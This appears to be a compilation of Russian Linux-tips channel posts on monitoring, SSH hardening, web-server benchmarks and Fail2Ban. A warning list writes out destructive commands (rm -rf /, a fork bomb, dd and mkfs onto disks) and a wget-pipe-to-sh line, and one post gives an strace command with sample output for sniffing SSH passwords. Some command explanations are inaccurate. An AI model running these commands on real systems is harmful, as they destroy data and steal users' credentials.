🚀 Твой незаменимый помощник: Скрипт для мониторинга Linux!

Привет, повелитель терминала! 🖥️ Сегодня я поделюсь с тобой скриптом, который поможет тебе следить за производительностью твоей Linux-системы. Этот инструмент быстро оценит состояние системы и выявит узкие места. Давай посмотрим, как он работает!

Скрипт для мониторинга:

#!/bin/bash
# Colors for readability
GREEN='\033[0;32m'
YELLOW='\033[1;33m'
RED='\033[0;31m'
NC='\033[0m' # No Color
echo -e "${GREEN}===== System Monitoring Script =====${NC}"

# 1. CPU Usage
echo -e "${YELLOW}\n>> CPU Usage: ${NC}"
mpstat | awk '/all/ {print "CPU Load: " $3 "% idle"}'

# 2. Memory Usage
echo -e "${YELLOW}\n>> Memory Usage: ${NC}"
free -h | awk '/Mem/ {print "Total Memory: " $2 "\nUsed: " $3 "\nFree: " $4}'
echo -e "Swap:\n"$(free -h | awk '/Swap/ {print "Total: " $2 ", Used: " $3 ", Free: " $4}')

# 3. Disk Usage
echo -e "${YELLOW}\n>> Disk Usage: ${NC}"
df -h | grep '^/dev' | awk '{print $1 ": " $5 " used, " $4 " available"}'

# 4. Network Traffic
echo -e "${YELLOW}\n>> Network Traffic: ${NC}"
ifstat -i eth0 1 1 | awk 'NR==3 {print "RX: " $1 " KB/s, TX: " $2 " KB/s"}'

# 5. Top 5 Memory Consuming Processes
echo -e "${YELLOW}\n>> Top 5 Memory Consuming Processes: ${NC}"
ps -eo pid,ppid,cmd,%mem,%cpu --sort=-%mem | head -n 6

# 6. Top 5 CPU Consuming Processes
echo -e "${YELLOW}\n>> Top 5 CPU Consuming Processes: ${NC}"
ps -eo pid,ppid,cmd,%mem,%cpu --sort=-%cpu | head -n 6

# 7. System Logs Monitoring
echo -e "${YELLOW}\n>> Recent Errors in System Logs: ${NC}"
journalctl -p 3 -xb | tail -n 10

echo -e "${GREEN}===== Monitoring Completed =====${NC}"

Что делает этот скрипт?

1. CPU Usage: Показывает загрузку процессора.
2. Memory Usage: Отображает использование оперативной памяти и swap.
3. Disk Usage: Информирует о занятом и доступном дисковом пространстве.
4. Network Traffic: Показывает входящий и исходящий трафик.
5. Top 5 Memory Consuming Processes: Выводит процессы, потребляющие больше всего памяти.
6. Top 5 CPU Consuming Processes: Выводит процессы, потребляющие больше всего CPU.
7. System Logs Monitoring: Показывает последние ошибки в системных логах.

Этот скрипт — твой надежный помощник в мониторинге системы. Запускай его, чтобы всегда быть в курсе состояния твоего сервера.

📩 Завтра: Открой секреты защиты от DDoS-атак с помощью экспертов!
Включи 🔔 чтобы не пропустить!
____________________

Дополнительный материал:
🧠 - Управление Особыми Режимами в Linux: Разблокировка Доступа с chmod
🧠 - Разбираемся с командой Basename: Ваш ключ к упрощению работы с файлами в Linux
🧠 - От MythTV до LibreELEC: Как Linux Перевернул Мир Мультимедиа

#Linux_Mastery @LinuxSkill #Linux #Bash #Monitoring

🔍 Как найти различия между двумя деревьями каталогов в Linux?

Ты когда-нибудь задумывался, как быстро сравнить содержимое двух директорий и выявить различия? Сегодня мы расскажем, как это сделать с помощью команды diff в Linux.

Чтобы сравнить два дерева каталогов и найти различия в содержимом файлов, используй команду diff с флагами -qr:

diff -qr dir1/ dir2/

- -q или --brief — выводит только информацию о различиях, без детального сравнения.
- -r или --recursive — рекурсивно обходит все подкаталоги.

Если ты хочешь увидеть различия для файлов, которые могут отсутствовать в одной из директорий, добавь флаг -N:

diff -qrN dir1/ dir2/

Используя эти команды, ты сможешь легко и быстро выявить различия между двумя директориями, что особенно полезно при управлении версиями и контроле изменений. Попробуй сам и убедись, насколько это удобно!

🌳 Ветка: https://stackoverflow.com/questions/4997693/given-two-directory-trees-how-can-i-find-out-which-files-differ-by-content

📩 Завтра: 18 команд которые должен знать каждый линуксоид!
Включи 🔔 чтобы не пропустить!
____________________

Дополнительный материал:
🧠 - Мастерство использования команды chown для смены владельца файлов и каталогов
🧠 - Станьте Мастером Календаря в Linux с Cal и NCal
🧠 - Станьте Мастером Управления Пользователями в Linux

#stackoverflow @LinuxSkill #Linux #Diff #DirectoryComparison #SysAdmin #DevOps

🔍 Открой секреты своей системы: 18 команд которые должен знать каждый линуксоид!

Привет, линукс-мастер! Сегодня я расскажу тебе о полезных командах, которые помогут быстро получить сведения о системе и активности пользователей. Эти команды — твои лучшие друзья в мире Linux. Давай разберемся, что и как использовать!

Основные команды для мониторинга:

1. Системная информация:

   date        # Текущая дата и время
   cal         # Календарь на текущий месяц
   uptime      # Время с момента последней загрузки ОС
   uname -a    # Все сведения о системе
   uname -vr   # Номер выпуска ОС и версия ядра

2. Активность пользователей:

   w           # Сведения о зарегистрированных пользователях
   users       # Список имен вошедших пользователей
   last        # История входов пользователей
   lastlog     # Время последнего входа всех пользователей
   whoami      # Имя текущего пользователя
   finger user # Информация о пользователе

3. Использование ресурсов:

   df          # Использование дисков
   du          # Использование текущего каталога
   free        # Использование реальной и виртуальной памяти

4. Поиск и справка:

   whatis app  # Краткая информация об app
   whereis app # Местоположение исполняемого модуля app
   which app   # Исполняемый модуль по умолчанию
   man command # Справочная информация для команды

Эти команды помогут тебе быстро ориентироваться в системе и управлять ею. Попробуй их в действии и делись своими успехами!

📩 Завтра: Никогда не запускай эти 11 команд в Linux!
Включи 🔔 чтобы не пропустить!
____________________

Дополнительный материал:
🧠 - Меняем владельца файлов в Linux с помощью chown: Пошаговое руководство!
🧠 - Установка Разрешений по Умолчанию в Linux с umask: Ваш Путеводитель!
🧠 - Станьте Гуру Управления Загрузчиком GRUB с LinuxSkill

#Linux_Commands @LinuxSkill

⚠️ Осторожно: Никогда не запускай эти 11 команд в Linux!

Привет, линукс-мастер! 🖥️ Сегодня я расскажу тебе о командах, которые могут нанести серьезный ущерб твоей системе. Эти команды лучше никогда не запускать, если ты не хочешь потерять данные или столкнуться с проблемами безопасности. Давай разберемся, что и почему стоит избегать!

Опасные команды:

1. rm -rf /:
- Удаляет все файлы и папки на компьютере. Полная потеря данных.

2. :(){ :|: & };::
- Известная как "fork bomb", может вызвать переполнение памяти и аварийное завершение системы.

3. mkfs.ext4 /dev/sda:
- Форматирует жесткий диск без предупреждения. Все данные будут утеряны.

4. dd if=/dev/random of=/dev/sda:
- Перезаписывает данные на жестком диске случайными значениями, что приводит к потере данных.

5. chmod 777 /:
- Открывает полный доступ к файловой системе для всех пользователей, что может нарушить безопасность.

6. **mv /home/* /dev/null**:
- Перемещает все файлы из домашней директории в "null", что приводит к их потере.

7. wget http://example.com/file -O /dev/null:
- Загружает файл и перезаписывает данные в "null", что приводит к потере данных.

8. mkfs.ext4 /dev/sda1:
- Форматирует раздел жесткого диска без предупреждения. Все данные на разделе будут утеряны.

9. ln -s /dev/null /etc/passwd:
- Создает символическую ссылку на "/etc/passwd" в "null", что приводит к потере данных.

10. echo "Hello" > /dev/sda:
- Заменяет раздел, содержащий данные для загрузки системы, строкой «Hello».

11. wget http://malicious_source -O- | sh:
- Загружает и запускает вредоносные сценарии, которые могут подорвать безопасность системы.

Эти команды могут нанести непоправимый ущерб твоей системе. Будь осторожен и всегда проверяй команды перед их выполнением. Береги свои данные и безопасность!

📩 Завтра: Вопрос №8 из теста Linux Essentials Certification
Включи 🔔 чтобы не пропустить!
____________________

Дополнительный материал:
🧠 - Глубокое Погружение в Жесткие Ссылки: Создание и Управление в Linux
🧠 - Мастер-класс по Сокрытию Файлов и Каталогов в Linux: Станьте Невидимкой
🧠 - Создание Ссылок в Linux: Символические и Жесткие Пути к Управлению Данными

#Linux_Mastery @LinuxSkill

🔐 Защита SSH-сервера: порты, ключи и iptables

Хочешь узнать, как защитить свой SSH-сервер от несанкционированного доступа? В этом видео мы расскажем о лучших практиках, включая порт-нокинг, использование ключей и настройку iptables.

1. Введение в порт-нокинг (00:00):
- Порт-нокинг скрывает открытые порты, делая их доступными только через правильные комбинации стуков. Это как дверь без замочной скважины, которая открывается только при правильной комбинации.

2. Порты и ключи в сетевых протоколах (00:58):
- Порты позволяют нескольким программам работать одновременно. Например, SSH и веб-сервер используют разные порты для разграничения запросов.

3. Защита SSH-сервера (02:39):
- Замена стандартного порта SSH на нестандартный и использование ключей вместо паролей для повышения безопасности.

4. Настройка iptables (15:51):
- Установка и настройка iptables для управления входящими и исходящими соединениями. Это помогает защитить сервер от несанкционированного доступа.

5. Проверка безопасности (22:24):
- Проверка, что порт 45916 не отличается от других, и сканеры портов не могут определить наличие SSH-сервера.

6. Доступ к серверу (23:57):
- Использование утилиты nmp для доступа к серверу через правильные порты.

Заключение (28:30): Порт сервера закрыт снаружи, но доступен при правильном постукивании. Надеемся, что видео было полезным. Ставьте лайки и подписывайтесь на канал!

Источник: https://www.youtube.com/watch?v=5TCvRlD1sSw

📩 Завтра: Вопрос №9 из теста Linux Essentials Certification
Включи 🔔 чтобы не пропустить!
________________

Дополнительный материал:
🧠 - Linux и Команды Выключения: Сцена для systemctl
🧠 - Путешествие по команде shutdown
🧠 - Как настроить и использовать Ctrl+Alt+Delete в Linux для надежной перезагрузки

#Linux_youtube @LinuxSkill #Linux #SSH #Security #PortKnocking #Iptables #SysAdmin #DevOps

🎥 Производительность Nginx vs Apache: кто победит?

В этом видео мы сравниваем два популярных веб-сервера — Nginx и Apache. Узнай, какой из них лучше справляется с нагрузкой и обеспечивает стабильную работу.


1. Введение и цели теста (00:00):
- Сравнение производительности Nginx и Apache на AWS.
- Измерение задержки, вывода данных и насыщенности сервисов.

2. Первый тест (01:38):
- Развертывание серверов на виртуальных машинах с использованием статического веб-сайта.
- Генерация нагрузки через кластер EKS.

3. Второй тест (02:36):
- Использование TLS и HTTP/2 для повышения производительности.
- Google оценивает сайты выше при использовании HTTPS.

4. Третий тест (03:12):
- Веб-серверы как обратные прокси: безопасность, масштабируемость, балансировка нагрузки.

5. Результаты первого теста (05:26):
- Nginx обрабатывает в три раза больше запросов в секунду, чем Apache.
- Apache снижает производительность при 8000 запросах в секунду.

6. Результаты второго теста (08:10):
- Nginx лучше справляется с нагрузкой при 85% загрузке процессора.
- Apache начинает снижать производительность при 7000 запросах в секунду.

7. Результаты третьего теста (11:02):
- Apache показывает лучшую производительность как прокси-сервер.
- Nginx демонстрирует нестабильность при высокой загрузке.

8. Использование памяти и сетевой трафик (14:10):
- Анализ использования памяти и сетевого трафика.
- Планируется тестирование Apache Ingress Controller для сравнения с Nginx.

Результаты тестов показывают, что Nginx превосходит Apache в обработке запросов, но Apache может быть более стабильным как прокси-сервер. Подписывайтесь на канал, чтобы не пропустить новые тесты и сравнения!
Источник: https://www.youtube.com/watch?v=UGp4LmocE7o

📩 Завтра: Как измерить время выполнения программы в Linux?
Включи 🔔 чтобы не пропустить!
____________________

Дополнительный материал:
🧠 - Овладейте искусством управления системой с серией руководств по Systemd
🧠 - Алфавит команд Linux
🧠 - Погружаемся в a2disconf

#Linux_youtube @LinuxSkill #Linux #Nginx #Apache #Performance #SysAdmin #DevOps

⏱️ Как измерить время выполнения программы в Linux?

Хочешь узнать, сколько времени занимает выполнение твоих скриптов или команд в Linux? Сегодня мы расскажем, как использовать встроенную команду time для этого.

Основная информация:

Команда time позволяет измерить реальное время, затраченное на выполнение команды, а также время работы процессора. Вот как это сделать:

1. Использование команды time:

Просто добавь time перед командой, которую хочешь измерить. Например:

   time sleep 2

Вывод будет примерно таким:

   real    0m2.009s
   user    0m0.000s
   sys     0m0.004s

- real — общее время выполнения.
- user — время, затраченное на выполнение пользовательского кода.
- sys — время, затраченное на выполнение системного кода.

2. Измерение времени для нескольких команд:

Если нужно измерить время выполнения нескольких команд, используй группу команд:

   time { command1; command2; }

Используя команду time, ты можешь легко измерять производительность своих скриптов и оптимизировать их. Попробуй сам и убедись, насколько это полезно!

🌳 Ветка: https://stackoverflow.com/questions/385408/get-program-execution-time-in-the-shell

📩 Завтра: Как не стать жертвой сниффинга паролей на Linux
Включи 🔔 чтобы не пропустить!
____________________

Дополнительный материал:
🧠 - Открываем Мир b2-tools
🧠 - Открываем Все Тайны Команды Cat
🧠 - Разгадываем Загадки с Diff3

#stackoverflow @LinuxSkill #Linux #TimeCommand #Performance #SysAdmin #DevOps

🚨 Осторожно: Как не стать жертвой сниффинга паролей на Linux!

Привет, линукс-мастер! 🖥️ Сегодня я расскажу тебе о том, как некоторые используют strace для перехвата паролей пользователей, подключающихся по SSH. Это знание поможет тебе защитить свои системы и избежать неприятностей. Давай разберемся, как это работает и как защититься!

Как работает сниффинг с помощью strace:

1. Запуск strace для отслеживания процессов SSH:

   strace -f -p $(pgrep -o sshd) -o /tmp/passwd.txt -v -e trace=write -s 64

- -f: Следим за всеми процессами sshd (мастер и дочерние).
- -p: Ищем все PID процессов sshd.
- -o: Файл, куда пишем результаты.
- -v: Пишем подробности.
- -e: Триггеримся только на запись данных.
- -s: Ограничиваем вывод данных 64 байтами (меньше мусора).

2. Что происходит:
- Когда пользователь авторизуется по SSH, его пароль записывается в файл passwd.txt в открытом виде.

3. Пример вывода:

   1088 write(5,"\0\0\0\5oleg", 9) = 9
   1088 write(5, "\0\0\0\Barmaley1982", 17) = 17

- Логин oleg, пароль Barmaley1982.

Важно помнить:

- Эта информация предназначена исключительно для образовательных целей. Использование таких методов для незаконных действий строго запрещено.
- Защищай свои системы, следи за безопасностью и соблюдай законы своей страны.

Береги свои данные и безопасность!

📩 Завтра: Автоматизация кибербезопасности: 5 полезных скриптов на Bash
Включи 🔔 чтобы не пропустить!
____________________

Дополнительный материал:
🧠 - Управление Съемными Носителями с Eject
🧠 - Разложение на Простые Множители с Factor
🧠 - Погружение в Команду Groups

#Linux_Mastery @LinuxSkill

🔒 Автоматизация кибербезопасности: 5 полезных скриптов на Bash

Привет, кибер-путешественник! 🖥️ Сегодня я расскажу тебе о пяти скриптах на Bash, которые помогут автоматизировать рутинные задачи в кибербезопасности. Эти инструменты могут стать твоими надежными помощниками в защите систем. Давай посмотрим, как они работают!

1. Сканирование портов с использованием nmap:

#!/bin/bash
# Сканирование портов конкретного хоста
echo "Введите адрес хоста для сканирования:"
read host
echo "Сканирование портов для хоста $host..."
nmap $host

- Этот скрипт позволяет быстро сканировать порты указанного хоста.

2. Проверка статуса веб-сервера:

#!/bin/bash
# Проверка статуса веб-сервера по HTTP статус-коду
url="http://example.com" # Замените example.com на реальный URL
status_code=$(curl -o /dev/null -s -w "%{http_code}\n" $url)
if [ $status_code -eq 200 ]; then
  echo "Веб-сервер $url работает нормально (HTTP статус 200)"
else
  echo "Веб-сервер $url имеет проблемы (HTTP статус $status_code)"
fi

- Проверяет доступность веб-сервера по HTTP статус-коду.

3. Поиск изменений в файлах (интегритет):

#!/bin/bash
# Проверка интегритета файлов в заданной директории
directory="/var/www/html" # Замените на директорию, которую нужно отслеживать
hash_file="hashes.txt"
# Генерируем хэши файлов и сохраняем их для последующего сравнения
find $directory -type f -exec sha256sum "{}" + > $hash_file
# Функция, которая проверяет хэши
check_hashes() {
  sha256sum -c $hash_file
}
# Вызываем функцию
check_hashes

- Следит за изменениями в файлах, проверяя их хэши.

4. Автоматическое создание бэкапов логов:

#!/bin/bash
# Автоматическое создание бэкапов логов
log_path="/var/log/apache2" # Замените на путь к вашей папке с логами
backup_path="/backup/apache2"
# Создаем каталог для бэкапа, если он не существует
mkdir -p $backup_path
# Архивируем и перемещаем логи
tar -czvf $backup_path/log-$(date +%F).tar.gz $log_path

- Автоматически создает резервные копии логов.

5. Мониторинг и оповещение об активности в логах:

#!/bin/bash
# Мониторинг и оповещение о подозрительной активности в логах
log_file="/var/log/auth.log" # Замените на путь к вашему лог-файлу
pattern="Failed password" # Замените на паттерн, который вы хотите отслеживать
# Чтение новых строк из лог-файла
tail -fn0 $log_file | \
while read line ; do
  echo "$line" | grep "$pattern" > /dev/null
  if [ $? = 0 ]; then
    # Отправляем уведомление
    echo "Подозрительная активность: $line"
    # Здесь может быть команда для отправки уведомления, например, через mailx
  fi
done

- Следит за логами и оповещает о подозрительной активности.

Эти скрипты — лишь начало. В реальных сценариях тебе понадобятся более сложные проверки и интеграции. Всегда тестируй скрипты в безопасной среде перед их использованием в продакшене. 🛡️

Ссылка на источник https://timcore.ru/2024/03/07/pjat-skriptov-na-bash-kotorye-mogut-ispolzovatsja-dlja-avtomatizacii-rutinnyh-zadach-v-kiberbezopasnosti/

📩 Завтра: Вопрос №10 из теста Linux Essentials Certification
Включи 🔔 чтобы не пропустить!
____________________

Дополнительный материал:
🧠 - Введение в Команду Head
🧠 - Навигация по Сетевым Интерфейсам с Ifconfig
🧠 - Мастерство Слияния Файлов с Join

#Linux_Mastery @LinuxSkill

🎥 Сравнение производительности Nginx и Caddy Performance: кто победит?

В этом видео мы сравниваем два мощных веб-сервера — Nginx и Caddy. Узнай, какой из них лучше справляется с нагрузкой и обеспечивает стабильную работу.

Основная информация:

1. Введение и цели теста (00:00):
- Сравнение Nginx и Caddy Performance как веб-серверов и обратных прокси-серверов.
- Тестирование обслуживания статического веб-сайта по HTTPS и балансировки нагрузки.

2. Настройка и оборудование (00:55):
- Использование AWS и новейших инстансов EC2 для создания кластера EKS.
- Применение Route 53 для обнаружения сервисов и Next.js для создания веб-сайта.

3. Настройка веб-серверов (01:53):
- Создание больших инстансов EC2 с двумя процессорами и 8 ГБ памяти.
- Настройка сертификатов для аутентификации и безопасности.

4. Оптимизация Nginx (03:38):
- Использование оптимизированной конфигурации для повышения производительности.
- Настройка мультиподключения и увеличение лимита открытых файлов.

5. Настройка Caddy (04:37):
- Использование минимальной конфигурации и включение сжатия.
- Формат логов, аналогичный Nginx и Apache.

6. Результаты первого теста (06:27):
- Nginx показал меньшую задержку и обработал больше запросов, чем Caddy.
- Caddy начал отставать при 8000 запросах в секунду.

7. Тестирование Nginx и Caddy (08:19):
- Nginx достиг 80% загрузки процессора и не сбоил.
- Caddy ухудшился при 8000 запросах, достигнув максимума при 10000 запросов.

8. Сетевой трафик и производительность (09:55):
- Nginx передавал почти 600 МБ/с, обеспечивая более высокую производительность.

9. Второй тест с обратным прокси (11:16):
- Caddy превзошел Nginx по производительности, но ненадолго.
- Nginx обработал почти 27000 запросов за 2 часа.

Nginx обработал почти вдвое больше запросов, чем Caddy, обеспечив более высокую пропускную способность и меньшую задержку. Рекомендуется использовать Nginx для веб-серверов и обратных прокси-серверов.

Источник: https://www.youtube.com/watch?v=N5PAU-vYrN8

📩 Завтра: Вопрос №11 из теста Linux Essentials Certification
Включи 🔔 чтобы не пропустить!
____________________

Дополнительный материал:
🧠 - Управление Процессами с Kill
🧠 - Временная Капсула с Last
🧠 - Как проверить файлы на целостность и не поймать вирус? Просто запусти md5sum!

#Linux_youtube @LinuxSkill #Linux #Nginx #Caddy #Performance #SysAdmin #DevOps

🎥 Как сделать простую защиту от DoS-атак с Fail2Ban?

Хочешь защитить свой веб-сервер от DoS-атак? В этом видео мы покажем, как настроить Fail2Ban для эффективной защиты.

1. Установка Fail2Ban (00:00):
- Установка Fail2Ban для защиты веб-сервера.
- Запуск и проверка статуса сервиса.

2. Конфигурация Fail2Ban (00:37):
- Конфигурационный файл находится в /etc/fail2ban/jail.conf.
- Настройка времени блокировки через директиву ban-time.

3. Настройка ограничения скорости запросов (02:15):
- Добавление директивы для ограничения скорости обработки HTTP-запросов.
- Настройка зоны разделяемой памяти для IP-адресов.
- Перезагрузка Fail2Ban.

4. Тестирование и логирование (04:07):
- Запуск теста на IP-адрес для проверки логирования.
- Логирование ошибок и запросов.

5. Добавление правил для фильтра (05:15):
- Настройка правил для блокировки IP-адресов на 300 секунд при превышении лимита запросов.

6. Защита от DOS-атак (06:52):
- Настройка модуля для ограничения числа запросов.
- Проверка и раскомментирование регулярного выражения.

7. Проверка работы Fail2Ban (08:37):
- Тестирование блокировки IP-адреса при превышении лимита запросов.
- Проверка работы через VPN.

Fail2Ban — это простой и эффективный способ защиты от DoS-атак. Настройте его на своем сервере и убедитесь в его надежности!

Источник: https://www.youtube.com/watch?v=rBKvXaDsFvM

📩 Завтра: Что означает $@ в shell скрипте?
Включи 🔔 чтобы не пропустить!
____________________

Дополнительный материал:
🧠 - Текстовый редактор Nano — как работать с файлами на минималках и не страдать!
🧠 - Почувствуй себя цифровым рентгенологом — откроем файлы насквозь с Od!
🧠 - Давно занимался спортом? Нет? Ну вот, пора хотя бы пароли сменить!

#Linux_youtube @LinuxSkill #Linux #Fail2Ban #DoSProtection #SysAdmin #DevOps

🛠️ Что означает $@ в shell скрипте?

Если ты когда-либо задавался вопросом, что такое $@ в shell скрипте, то сегодня мы разберем эту загадку и покажем, как использовать его для передачи параметров.

$@ представляет собой все параметры, переданные скрипту. Например, если ты вызовешь скрипт так:

./someScript.sh foo bar

то $@ будет равно foo bar.

Когда внутри someScript.sh ты используешь:

umbrella_corp_options "$@"

каждый параметр будет передан в umbrella_corp_options в двойных кавычках. Это позволяет передавать параметры с пробелами, как единое целое.

Пример использования:

Если ты вызовешь:

./someScript.sh foo bar "boo far"

то $@ в двойных кавычках будет содержать три аргумента: "foo", "bar" и "boo far".

Использование $@ в shell скриптах позволяет легко и безопасно передавать параметры, включая те, которые содержат пробелы. Попробуй сам и убедись, насколько это удобно!

🌳 Ветка: https://stackoverflow.com/questions/9994295/what-does-mean-in-a-shell-noscript

📩 Завтра: Защити свой сервер: Настройка безопасности SSH на Linux
Включи 🔔 чтобы не пропустить!
____________________

Дополнительный материал:
🧠 - Текстовый редактор Nano — как работать с файлами на минималках и не страдать!
🧠 - Почувствуй себя цифровым рентгенологом — откроем файлы насквозь с Od!
🧠 - Давно занимался спортом? Нет? Ну вот, пора хотя бы пароли сменить!

#stackoverflow @LinuxSkill #Linux #ShellScripting #SysAdmin #DevOps

🔒 Защити свой сервер: Настройка безопасности SSH на Linux

Привет, линукс-мастер! 🖥️ Сегодня я расскажу тебе, как настроить безопасность SSH соединения на твоем сервере. Это важный шаг для защиты от несанкционированного доступа. Давай разберемся, как это сделать!

Подготовка:

1. Настройка SSH авторизации по сертификатам:
- Убедись, что ты уже авторизуешься на серверах через сертификаты SSH.

2. Бэкап конфигурации:

   sudo cp /etc/ssh/sshd_config /etc/ssh/sshd_config.bkp

Основные настройки:

1. Жестко прописываем IP адрес SSH сервера:

   ListenAddress 192.168.1.100 # ip ag-dc-1
   ListenAddress 192.168.1.101 # ip ag-dc-2

2. Изменяем порт SSH сервера:

   Port 54322

3. Включаем только протокол второй версии:

   Protocol 2

4. Ограничиваем время и количество попыток авторизации:

   LoginGraceTime 10s
   MaxAuthTries 2

5. Включаем разделение прав пользователей:

   UsePrivilegeSeparation yes

6. Ограничиваем список доступа по SSH:

   AllowUsers adminguideru root@192.168.1.100 root@192.168.1.101

7. Отключаем пустые пароли и доверенные хосты:

   PermitEmptyPasswords no
   IgnoreRhosts yes
   HostbasedAuthentication no

Проверка и завершение:

1. Перезапуск SSH сервера:

   sudo systemctl restart ssh sshd

2. Проверка подключения через Putty:
- Убедись, что можешь подключиться с админской машины с помощью сертификата.

3. Ограничение IP адресов:

   sudo nano /etc/hosts.allow

- Добавь IP адреса всех участников локальной сети.

4. Проверка авторизации по паролю:

   sudo nano /etc/ssh/sshd_config

- Убедись, что PasswordAuthentication установлено в no.

5. Перезагрузка хостов:
- Если что-то пошло не так, восстанови конфигурацию из бэкапа:

   sudo cp /etc/ssh/sshd_config.bkp /etc/ssh/sshd_config

Теперь твой сервер защищен, и ты можешь быть уверен в безопасности своих данных. Радуйся, ведь теперь напакостить по SSH сможешь только ты сам!

📩 Завтра:
Включи 🔔 чтобы не пропустить!
____________________

Дополнительный материал:
🧠 - Секреты qemu-img, которые сэкономят твой диск
🧠 - Забудь про файлы, они исчезнут
🧠 - Наконец-то! Как стать суперпользователем без риска оказаться в тюрьме!

#Linux_Mastery @LinuxSkill

🛠️ Избавься от лишнего: Как установить только нужные пакеты в Linux

Привет, линукс-мастер! Сегодня я расскажу тебе, как избежать установки ненужных пакетов, когда ты ставишь софт через apt. Эти "паразиты" могут тянуть за собой кучу лишнего, но я покажу, как от них избавиться. Давай разберемся!

Проблема с Recommended packages:

Когда ты устанавливаешь программу, например, Midnight Commander (mc), вместе с ней могут устанавливаться дополнительные пакеты, которые не всегда нужны:

apt install mc

- Вместе с mc могут установиться mailcap и unzip, которые не обязательны для работы программы.

Как избежать установки "паразитов":

Чтобы установить только необходимые пакеты, используй флаг --no-install-recommends:

apt install mc --no-install-recommends

- Это установит только libssh2-1, mc, и mc-data, без лишних пакетов.

Как глобально отключить Recommended packages:

1. Создай файл /etc/apt/apt.conf.d/99norecommends:

   sudo nano /etc/apt/apt.conf.d/99norecommends

2. Вставь в него:

   APT::Install-Recommends "false";

Теперь apt не будет устанавливать рекомендованные пакеты по умолчанию.

Как установить рекомендованные пакеты для конкретного случая:

Если тебе все-таки нужны рекомендованные пакеты для конкретной программы, используй:

apt-get install mc --install-recommends

Теперь ты знаешь, как контролировать установку пакетов и избегать лишнего. Пользуйся на здоровье и делись своими успехами! 🥳

📩 Завтра: Вопрос №12 из теста Linux Essentials Certification
Включи 🔔 чтобы не пропустить!
____________________

Дополнительный материал:
🧠 - Забудь про начало! Как Tac покажет тебе всё важное с последней строки
🧠 - Не знал про эту команду? Вот как uname спасет твой Linux!
🧠 - Ты точно в курсе всех файлов? Vdir покажет больше, чем ты ожидал!

#Linux_Mastery @LinuxSkill